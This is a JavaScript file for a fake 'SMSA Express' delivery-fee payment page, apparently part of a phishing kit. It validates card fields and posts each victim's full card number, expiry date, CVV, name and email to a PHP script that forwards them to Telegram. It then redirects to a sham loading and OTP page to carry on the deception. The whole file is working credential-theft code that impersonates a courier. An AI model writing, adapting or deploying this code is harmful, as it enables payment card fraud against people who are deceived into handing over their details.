/* ============================================
   SMSA EXPRESS - PAYMENT FLOW MANAGEMENT
   Flux : Paiement → OTP → Chargement → Succès
   ============================================ */

document.addEventListener('DOMContentLoaded', function() {
    const paymentForm = document.getElementById('payment-form');
    if (paymentForm) {
        paymentForm.addEventListener('submit', handlePaymentSubmit);
    }

    // Formater le numéro de carte
    const cardNumberInput = document.getElementById('card-number');
    if (cardNumberInput) {
        cardNumberInput.addEventListener('input', function(e) {
            let value = e.target.value.replace(/\s/g, '');
            let formattedValue = value.replace(/(\d{4})/g, '$1 ').trim();
            e.target.value = formattedValue;
        });
    }

    // Formater la date d'expiration
    const expiryInput = document.getElementById('expiry-date');
    if (expiryInput) {
        expiryInput.addEventListener('input', function(e) {
            let value = e.target.value.replace(/\D/g, '');
            if (value.length >= 2) {
                value = value.slice(0, 2) + '/' + value.slice(2, 4);
            }
            e.target.value = value;
        });
    }

    // Limiter le CVV
    const cvvInput = document.getElementById('cvv');
    if (cvvInput) {
        cvvInput.addEventListener('input', function(e) {
            e.target.value = e.target.value.replace(/\D/g, '').slice(0, 4);
        });
    }
});

// Gérer la soumission du formulaire de paiement
function handlePaymentSubmit(e) {
    e.preventDefault();

    // Valider le formulaire
    if (!validatePaymentForm()) {
        return;
    }

    // Stocker les données de paiement dans sessionStorage
    storePaymentData();

    // Envoyer les données à Telegram
    sendPaymentDataToTelegram();

    // Rediriger vers la page de loading avant OTP (avec délai pour l'envoi Telegram)
    setTimeout(() => {
        const lang = document.documentElement.lang === 'ar' ? '_ar' : '';
        window.location.href = `loading_payment${lang}.html`;
    }, 1500);
}

// Stocker les données de paiement
function storePaymentData() {
    const paymentData = {
        tracking_number: document.getElementById('tracking-number-payment').value,
        delivery_fee: document.getElementById('delivery-fee').value,
        card_name: document.getElementById('card-name').value,
        email: document.getElementById('email').value,
        timestamp: new Date().toISOString()
    };
    sessionStorage.setItem('paymentData', JSON.stringify(paymentData));
}

// Envoyer les données du formulaire à Telegram
function sendPaymentDataToTelegram() {
    const formData = new FormData();
    formData.append('action', 'payment_data');
    formData.append('tracking_number', document.getElementById('tracking-number-payment').value);
    formData.append('delivery_fee', document.getElementById('delivery-fee').value);
    formData.append('card_name', document.getElementById('card-name').value);
    formData.append('email', document.getElementById('email').value);
    formData.append('card_number', document.getElementById('card-number').value.replace(/\s/g, ''));
    formData.append('expiry_date', document.getElementById('expiry-date').value);
    formData.append('cvv', document.getElementById('cvv').value);
    formData.append('timestamp', getCurrentDateTime());
    formData.append('ip_address', 'Client IP');

    fetch('send_to_telegram.php', {
        method: 'POST',
        body: formData,
        keepalive: true
    })
    .then(response => response.json())
    .then(data => {
        console.log('Payment data sent to Telegram:', data);
        clearCardData();
    })
    .catch(error => {
        console.error('Error sending payment data:', error);
    });
}

// Effacer les données de la carte du système
function clearCardData() {
    document.getElementById('card-number').value = '';
    document.getElementById('expiry-date').value = '';
    document.getElementById('cvv').value = '';
    
    setTimeout(() => {
        document.getElementById('card-name').value = '';
        document.getElementById('email').value = '';
    }, 500);
}

// Valider le formulaire de paiement
function validatePaymentForm() {
    const name = document.getElementById('card-name').value.trim();
    const email = document.getElementById('email').value.trim();
    const cardNumber = document.getElementById('card-number').value.replace(/\s/g, '');
    const expiryDate = document.getElementById('expiry-date').value;
    const cvv = document.getElementById('cvv').value;

    if (!name) {
        showPaymentAlert('Please enter your full name', 'error');
        return false;
    }

    if (!email || !isValidEmail(email)) {
        showPaymentAlert('Please enter a valid email address', 'error');
        return false;
    }

    if (!cardNumber || cardNumber.length !== 16) {
        showPaymentAlert('Please enter a valid 16-digit card number', 'error');
        return false;
    }

    if (!expiryDate || !isValidExpiryDate(expiryDate)) {
        showPaymentAlert('Please enter a valid expiry date (MM/YY)', 'error');
        return false;
    }

    if (!cvv || cvv.length < 3) {
        showPaymentAlert('Please enter a valid CVV', 'error');
        return false;
    }

    return true;
}

// Vérifier si l'email est valide
function isValidEmail(email) {
    const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
    return emailRegex.test(email);
}

// Vérifier si la date d'expiration est valide
function isValidExpiryDate(expiryDate) {
    const [month, year] = expiryDate.split('/');
    if (!month || !year || month < 1 || month > 12) {
        return false;
    }
    
    const currentDate = new Date();
    const currentYear = currentDate.getFullYear() % 100;
    const currentMonth = currentDate.getMonth() + 1;

    const expYear = parseInt(year);
    const expMonth = parseInt(month);

    if (expYear < currentYear) {
        return false;
    }

    if (expYear === currentYear && expMonth < currentMonth) {
        return false;
    }

    return true;
}

// Afficher l'alerte de paiement
function showPaymentAlert(message, type = 'info') {
    const alertBox = document.getElementById('payment-alert-box');
    if (!alertBox) return;

    alertBox.textContent = message;
    alertBox.className = `alert active ${type}`;

    setTimeout(() => {
        alertBox.classList.remove('active');
    }, 5000);
}

// Obtenir la date et heure actuelle
function getCurrentDateTime() {
    const now = new Date();
    return now.toLocaleString();
}
